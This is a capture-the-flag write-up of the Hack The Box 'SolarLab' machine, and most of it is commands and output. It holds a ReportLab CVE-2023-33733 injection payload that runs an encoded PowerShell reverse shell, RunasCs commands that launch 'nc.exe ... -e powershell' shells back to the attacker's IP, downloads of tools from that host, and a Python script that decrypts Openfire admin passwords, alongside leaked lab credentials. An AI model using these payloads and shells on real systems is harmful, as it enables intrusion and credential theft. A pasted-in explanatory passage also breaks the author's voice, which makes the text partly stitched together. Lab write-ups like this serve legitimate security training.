SolarLab

Recon

└─$ tail -1 /etc/hosts
10.10.11.16     solarlab.htb

SMB

└─$ netexec smb solarlab.htb -u '' -p '' --shares
SMB         10.10.11.16     445    SOLARLAB         [*] Windows 10 / Server 2019 Build 19041 x64 (name:SOLARLAB) (domain:solarlab) (signing:False) (SMBv1:False)
SMB         10.10.11.16     445    SOLARLAB         [-] solarlab\: STATUS_ACCESS_DENIED
SMB         10.10.11.16     445    SOLARLAB         [-] Error getting user: list index out of range
SMB         10.10.11.16     445    SOLARLAB         [-] Error enumerating shares: Error occurs while reading from remote(104)

└─$ netexec smb solarlab.htb -u 'anonymous' -p '' --shares
SMB         10.10.11.16     445    SOLARLAB         [*] Windows 10 / Server 2019 Build 19041 x64 (name:SOLARLAB) (domain:solarlab) (signing:False) (SMBv1:False)
SMB         10.10.11.16     445    SOLARLAB         [+] solarlab\anonymous:
SMB         10.10.11.16     445    SOLARLAB         [*] Enumerated shares
SMB         10.10.11.16     445    SOLARLAB         Share           Permissions     Remark
SMB         10.10.11.16     445    SOLARLAB         -----           -----------     ------
SMB         10.10.11.16     445    SOLARLAB         ADMIN$                          Remote Admin
SMB         10.10.11.16     445    SOLARLAB         C$                              Default share
SMB         10.10.11.16     445    SOLARLAB         Documents       READ
SMB         10.10.11.16     445    SOLARLAB         IPC$            READ            Remote IPC

└─$ smbclient -U anonymous --no-pass //solarlab.htb/Documents
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  DR        0  Fri Apr 26 10:47:14 2024
  ..                                 DR        0  Fri Apr 26 10:47:14 2024
  concepts                            D        0  Fri Apr 26 10:41:57 2024
  desktop.ini                       AHS      278  Fri Nov 17 05:54:43 2023
  details-file.xlsx                   A    12793  Fri Nov 17 07:27:21 2023
  My Music                        DHSrn        0  Thu Nov 16 14:36:51 2023
  My Pictures                     DHSrn        0  Thu Nov 16 14:36:51 2023
  My Videos                       DHSrn        0  Thu Nov 16 14:36:51 2023
  old_leave_request_form.docx         A    37194  Fri Nov 17 05:35:57 2023

                7779839 blocks of size 4096. 1790217 blocks available
smb: \> recurse
smb: \> dir
  .                                  DR        0  Fri Apr 26 10:47:14 2024
  ..                                 DR        0  Fri Apr 26 10:47:14 2024
  concepts                            D        0  Fri Apr 26 10:41:57 2024
  desktop.ini                       AHS      278  Fri Nov 17 05:54:43 2023
  details-file.xlsx                   A    12793  Fri Nov 17 07:27:21 2023
  My Music                        DHSrn        0  Thu Nov 16 14:36:51 2023
  My Pictures                     DHSrn        0  Thu Nov 16 14:36:51 2023
  My Videos                       DHSrn        0  Thu Nov 16 14:36:51 2023
  old_leave_request_form.docx         A    37194  Fri Nov 17 05:35:57 2023

\concepts
  .                                   D        0  Fri Apr 26 10:41:57 2024
  ..                                  D        0  Fri Apr 26 10:41:57 2024
  Training-Request-Form.docx          A   161337  Fri Nov 17 05:46:57 2023
  Travel-Request-Sample.docx          A    30953  Fri Nov 17 05:36:54 2023

\My Music
NT_STATUS_ACCESS_DENIED listing \My Music\*

\My Pictures
NT_STATUS_ACCESS_DENIED listing \My Pictures\*

\My Videos
NT_STATUS_ACCESS_DENIED listing \My Videos\*
smb: \> prompt
smb: \> mget *
getting file \desktop.ini of size 278 as desktop.ini (0.8 KiloBytes/sec) (average 0.8 KiloBytes/sec)
getting file \details-file.xlsx of size 12793 as details-file.xlsx (30.4 KiloBytes/sec) (average 17.2 KiloBytes/sec)
getting file \old_leave_request_form.docx of size 37194 as old_leave_request_form.docx (73.2 KiloBytes/sec) (average 39.7 KiloBytes/sec)
getting file \concepts\Training-Request-Form.docx of size 161337 as concepts/Training-Request-Form.docx (138.9 KiloBytes/sec) (average 87.1 KiloBytes/sec)
getting file \concepts\Travel-Request-Sample.docx of size 30953 as concepts/Travel-Request-Sample.docx (29.9 KiloBytes/sec) (average 70.0 KiloBytes/sec)
NT_STATUS_ACCESS_DENIED listing \My Music\*
NT_STATUS_ACCESS_DENIED listing \My Pictures\*
NT_STATUS_ACCESS_DENIED listing \My Videos\*

Most of them are empty documents, except details-file.xlsx, which could be useful.

HTTP (80)

Nothing interesting on the site itself; it seems like a placeholder for the service. feroxbuster didn't find anything, and no subdomains were found with ffuf.

HTTP (6791)

When visiting the port we are redirected to the report subdomain.

┌──(woyag㉿kraken)-[~/Desktop/Rooms/SolarLab]
└─$ tail -1 /etc/hosts
10.10.11.16     solarlab.htb    report.solarlab.htb

After trying the credentials from the SMB Excel document, many of them don't work.

Username      Password
KAlexander    dkjafblkjadsfgl
blake.byte    ThisCanB3typedeasily1@
AlexanderK    danenacia9234n
ClaudiaS      dadsfawe9dafkn

Up to AlexanderK it said the username doesn't exist, and the password didn't work for either AlexanderK or ClaudiaS. But if we observe the names, they follow a pattern: {Firstname}{LastnameFirstChar}

Trying this on blake, we are able to log in: BlakeB:ThisCanB3typedeasily1@


If we generate any report we get:

https://security.snyk.io/vuln/SNYK-PYTHON-REPORTLAB-5664897 (CVE-2023-33733) PoC

The user input is limited to 300 characters, which makes this payload nearly impossible to fit. We can use other fields, but what was weird is that the server kept returning 500 and I wanted to see some output. If we start a listener and fire the reverse shell, we are able to catch it even though the server returns 500. Reverse shell from https://www.revshells.com

<para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('powershell -e 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') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'">
                exploit
</font></para>
┌──(woyag㉿kraken)-[~/Desktop/Rooms/SolarLab]
└─$ listen
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Listening on [::]:4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.11.16:62793.
whoami
solarlab\blake
PS C:\Users\blake\Documents\app>

C:\Users\blake\Documents\app\reports\instance\users.db:

id  username    password
1   BlakeB      BlakeB
2   ClaudiaS    ClaudiaS
3   AlexanderK  ClaudiaS
4   blakeb      ThisCanB3typedeasily1@
5   claudias    007poiuytrewq
6   alexanderk  HotP!fireguard

PS C:\users\blake> tree /f
Folder PATH listing
Volume serial number is 385E-AC57
C:.
├───Desktop
│       user.txt
├───Documents
│   │   start-app.bat
│   └───app
│       │   app.py
│       │   models.py
│       │   routes.py
│       │   utils.py
│       │
│       ├───instance
│       │       users.db
│       │
│       ├───reports
│       │   │   file.jpg
│       │   │
│       │   └───instance
│       │           users.db

User.txt

PS C:\users\blake> cat desktop/user.txt
65214e8f8b87c116b3b226200dee9383

Privilege Escalation

Running winPeas didn't show the ports listening on localhost:

PS C:\users\public> Get-NetTCPConnection -State Listen -Localaddress 127.0.0.1

LocalAddress                        LocalPort RemoteAddress                       RemotePort State       AppliedSetting
------------                        --------- -------------                       ---------- -----       --------------
127.0.0.1                           9091      0.0.0.0                             0          Listen
127.0.0.1                           9090      0.0.0.0                             0          Listen
127.0.0.1                           7443      0.0.0.0                             0          Listen
127.0.0.1                           7070      0.0.0.0                             0          Listen
127.0.0.1                           5276      0.0.0.0                             0          Listen
127.0.0.1                           5275      0.0.0.0                             0          Listen
127.0.0.1                           5270      0.0.0.0                             0          Listen
127.0.0.1                           5269      0.0.0.0                             0          Listen
127.0.0.1                           5263      0.0.0.0                             0          Listen
127.0.0.1                           5262      0.0.0.0                             0          Listen
127.0.0.1                           5223      0.0.0.0                             0          Listen
127.0.0.1                           5222      0.0.0.0                             0          Listen
127.0.0.1                           5000      0.0.0.0                             0          Listen

I saw people using Chisel to forward the traffic from the box to their machines (more about that under Tunneling).

First of all, use ConPtyShell to get a stable shell.

Privilege Escalation (openfire)

I somewhat gave up on the ports for a while and tried my luck with runas; winrm failed, but that's because the service isn't active. Using runas we can switch users:

PS C:\users> runas /user:openfire cmd
Enter the password for openfire: HotP!fireguard
Attempting to start cmd as user "SOLARLAB\openfire" ...
PS C:\users> whoami
solarlab\blake
PS C:\users> runas /user:openfire cmd
Enter the password for openfire: something wrong
Attempting to start cmd as user "SOLARLAB\openfire" ...
RUNAS ERROR: Unable to run - cmd
1326: The user name or password is incorrect.

The shell wasn't started, but the password is confirmed to be correct. The reason it failed is that UAC is in place, and from our shell we can't do anything about it.

PS C:\users> reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
    ...
    EnableLUA    REG_DWORD    0x1
    ...

Upload RunasCs.exe:

PS C:\Users\blake\AppData\Local\Temp> iwr http://10.10.16.74/rc.exe -outfile rc.exe
PS C:\Users\blake\AppData\Local\Temp> .\rc.exe openfire HotP!fireguard whoami -b
solarlab\openfire
PS C:\Users\blake\AppData\Local\Temp> iwr http://10.10.16.74/ncat.exe -outfile nc.exe
PS C:\Users\blake\AppData\Local\Temp> .\rc.exe openfire HotP!fireguard "C:\Users\blake\AppData\Local\Temp\nc.exe 10.10.16.74 4444 -e powershell" -b
[-] RunasCsException: CreateProcessWithLogonWUacBypass failed with error code: Access is denied
PS C:\Users\blake\AppData\Local\Temp> cd /Users/Public
PS C:\Users\Public> cp C:\Users\blake\AppData\Local\Temp\nc.exe .
PS C:\Users\Public> C:\Users\blake\AppData\Local\Temp\rc.exe openfire HotP!fireguard "C:\Users\Public\nc.exe 10.10.16.74 4444 -e powershell" -b

The openfire user doesn't have access to our directory, so RunasCs fails to execute, but we can use /Users/Public, which is accessible to most users.

During my enumeration I saw an openfire directory in Program Files; since the username and the directory name are the same, let's check it out.

└─$ listen
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Connection from 10.10.11.16:54255.

PS C:\Windows\system32> whoami
whoami
solarlab\openfire
PS C:\Program Files\openfire\conf> cat security.xml
...
  <!--
  Any other property defined in this file will be treated as an encrypted
  property. The value (in clear text) will be encrypted and migrated into
  the Openfire database during the next startup. The property name will
  be added to the list of encrypted properties and the clear text value
  will be removed from this file.

  <foo><bar>Secr3t$tr1ng!</bar></foo>
...
PS C:\Program Files\openfire> cat changelog.html | sls "<h2>.* -- <span" | select -first 5
cat changelog.html | sls "<h2>.* -- <span" | select -first 5

<h2>4.7.4 -- <span style="font-weight: normal;">November 9, 2022</span></h2>
<h2>4.7.3 -- <span style="font-weight: normal;">August 2, 2022</span></h2>
<h2>4.7.2 -- <span style="font-weight: normal;">July 13, 2022</span></h2>
<h2>4.7.1 -- <span style="font-weight: normal;">February 16, 2022</span></h2>
<h2>4.7.0 -- <span style="font-weight: normal;">January 19, 2022</span></h2>

https://www.cybersecurity-help.cz/vdb/ignite_realtime/openfire/4.7.4/ https://www.cybersecurity-help.cz/vdb/SB2023052418

Not interesting, since we are already on the machine and have access to the source.

Privilege Escalation (Administrator)

PS C:\Program Files\openfire\embedded-db> cat openfire.script
...
CREATE MEMORY TABLE PUBLIC.OFUSER(
	 USERNAME VARCHAR(64) NOT NULL
	,STOREDKEY VARCHAR(32)
	,SERVERKEY VARCHAR(32)
	,SALT VARCHAR(32)
	,ITERATIONS INTEGER
	,PLAINPASSWORD VARCHAR(32)
	,ENCRYPTEDPASSWORD VARCHAR(255)
	,NAME VARCHAR(100)
	,EMAIL VARCHAR(100)
	,CREATIONDATE VARCHAR(15) NOT NULL
	,MODIFICATIONDATE VARCHAR(15) NOT NULL
	,CONSTRAINT OFUSER_PK PRIMARY KEY(USERNAME)
)
...
INSERT INTO OFUSER VALUES(
	 'admin'
	,'gjMoswpK+HakPdvLIvp6eLKlYh0='
	,'9MwNQcJ9bF4YeyZDdns5gvXp620='
	,'yidQk5Skw11QJWTBAloAb28lYHftqa0x'
	,4096
	,NULL
	,'becb0c67cfec25aa266ae077e18177c5c3308e2255db062e4f0b77c577e159a11a94016d57ac62d4e89b2856b0289b365f3069802e59d442'
	,'Administrator'
	,'admin@solarlab.htb'
	,'001700223740785'
	,'0'
)
...
CREATE MEMORY TABLE PUBLIC.OFPROPERTY(
	 NAME VARCHAR(100) NOT NULL
	,PROPVALUE VARCHAR(4000) NOT NULL
	,ENCRYPTED INTEGER
	,IV CHARACTER(24)
	,CONSTRAINT OFPROPERTY_PK PRIMARY KEY(NAME)
)
...
INSERT INTO OFPROPERTY VALUES('passwordKey','hGXiFzsKaAeYLjn',0,NULL)
...

While looking for a way to decrypt the hash I came across a Hashcat forum thread (openfire hash) which explained how it works, with code to decrypt it:

Had a quick look at what OpenFire does and it is basically true what we said, but it does use SHA1 AND blowfish, basically. What one needs to have to decrypt the encrypted password (yes, they are encrypted not hashed, but there is also a SHA1 hash of the passwordKey field involved) is a passwordKey + the encrypted password. The first 8 bytes (16 chars, 8 hex) of the encrypted password is the initialization vector, the blowfish CBC key is stored in the database as "passwordKey" (<- this is SHA1 hashed before used as key to blowfish CBC).

Script: OpenFireDecryptPass.java
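A Python equivalent of that decryption, added here as an illustration (it is not the page's Java script nor Openfire's own code); it assumes pycryptodome or cryptography is installed for the Blowfish primitive and uses the passwordKey and encryptedPassword values from the openfire.script dump above. It also mirrors Openfire's own tolerant handling of short input and bad padding, which the forum description only hints at.

```python
import hashlib

# Values taken from the openfire.script dump above: OFUSER.ENCRYPTEDPASSWORD for 'admin'
# and the OFPROPERTY 'passwordKey' row.
ENCRYPTED_PASSWORD = ("becb0c67cfec25aa266ae077e18177c5c3308e2255db062e4f0b77c5"
                      "77e159a11a94016d57ac62d4e89b2856b0289b365f3069802e59d442")
PASSWORD_KEY = "hGXiFzsKaAeYLjn"


def _blowfish_cbc_decrypt(key: bytes, iv: bytes, data: bytes) -> bytes:
    """Raw Blowfish-CBC, no padding handling. Assumes pycryptodome or cryptography is installed."""
    try:
        from Crypto.Cipher import Blowfish  # pycryptodome
        return Blowfish.new(key, Blowfish.MODE_CBC, iv).decrypt(data)
    except ImportError:
        pass
    try:
        from cryptography.hazmat.decrepit.ciphers.algorithms import Blowfish  # cryptography >= 43
    except ImportError:
        from cryptography.hazmat.primitives.ciphers.algorithms import Blowfish  # older releases
    from cryptography.hazmat.primitives.ciphers import Cipher, modes
    dec = Cipher(Blowfish(key), modes.CBC(iv)).decryptor()
    return dec.update(data) + dec.finalize()


def openfire_decrypt(encrypted_hex: str, password_key: str) -> str:
    """Reverse an Openfire encryptedPassword: key = SHA1(passwordKey), the first 8 bytes of
    the hex blob are the CBC IV, the rest is the plaintext as UTF-16BE with PKCS#5 padding."""
    blob = bytes.fromhex(encrypted_hex)
    usable = len(blob) & ~7          # Openfire ignores a trailing partial block
    if usable < 8:
        raise ValueError("ciphertext too short: no IV block")
    key = hashlib.sha1(password_key.encode()).digest()
    iv, body = blob[:8], blob[8:usable]
    if not body:                     # IV only: Openfire returns the empty string
        return ""
    plain = _blowfish_cbc_decrypt(key, iv, body)
    pad = plain[-1]
    # Openfire tolerates a bad pad byte instead of failing; mirror that, but only strip a
    # well-formed PKCS#5 tail so a wrong passwordKey does not silently eat real bytes.
    if 1 <= pad <= 8 and plain.endswith(bytes([pad]) * pad):
        plain = plain[:-pad]
    return plain.decode("utf-16-be")


if __name__ == "__main__":
    recovered = openfire_decrypt(ENCRYPTED_PASSWORD, PASSWORD_KEY)
    print(f"{recovered} (hex: {recovered.encode('utf-16-be').hex().upper()})")
```

Because the passwordKey sits in the same embedded database as the ciphertext, read access to the openfire directory is equivalent to holding every stored admin password in clear.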

┌──(woyag㉿kraken)-[~/Desktop/Rooms/SolarLab]
└─$ javac OpenFireDecryptPass.java # Compile java
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true

┌──(woyag㉿kraken)-[~/Desktop/Rooms/SolarLab]
└─$ java OpenFireDecryptPass # Run java
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
[-] Please specify the encypted password and the "passwordKey"

┌──(woyag㉿kraken)-[~/Desktop/Rooms/SolarLab]
└─$ java OpenFireDecryptPass becb0c67cfec25aa266ae077e18177c5c3308e2255db062e4f0b77c577e159a11a94016d57ac62d4e89b2856b0289b365f3069802e59d442 hGXiFzsKaAeYLjn
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
ThisPasswordShouldDo!@ (hex: 005400680069007300500061007300730077006F0072006400530068006F0075006C00640044006F00210040)

I messed up big time here: the openfire user doesn't have access to blake's directory, so I had to redownload the file since I was disconnected too. Note to the future: use a directory where everyone has fucking access...

PS C:\Users\openfire\AppData\Local\Temp> iwr http://10.10.16.74/rc.exe -outfile rc.exe
iwr http://10.10.16.74/rc.exe -outfile rc.exe
PS C:\Users\openfire\AppData\Local\Temp> .\rc.exe Administrator ThisPasswordShouldDo!@ "C:\Users\Public\nc.exe 10.10.16.74 4444 -e powershell" -b
.\rc.exe Administrator ThisPasswordShouldDo!@ "C:\Users\Public\nc.exe 10.10.16.74 4444 -e powershell" -b

Root.txt

┌──(woyag㉿kraken)-[~/Desktop/Rooms/SolarLab]
└─$ listen
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Connection from 10.10.11.16:50530.
PS C:\Windows\system32> whoami
solarlab\administrator
PS C:\Users\Administrator\Desktop> cat root.txt
cat root.txt
2c30666cd35226b4a5f36f20a61ea77d

Writeups Referenced: https://medium.com/@Null0X0/solarlab-machine-htb-season-5-walkthrough-writeup-0be6c53a467a https://medium.com/@mjd.jellali/hackthebox-solarlab-walkthrough-5c9bd1bdcdb1
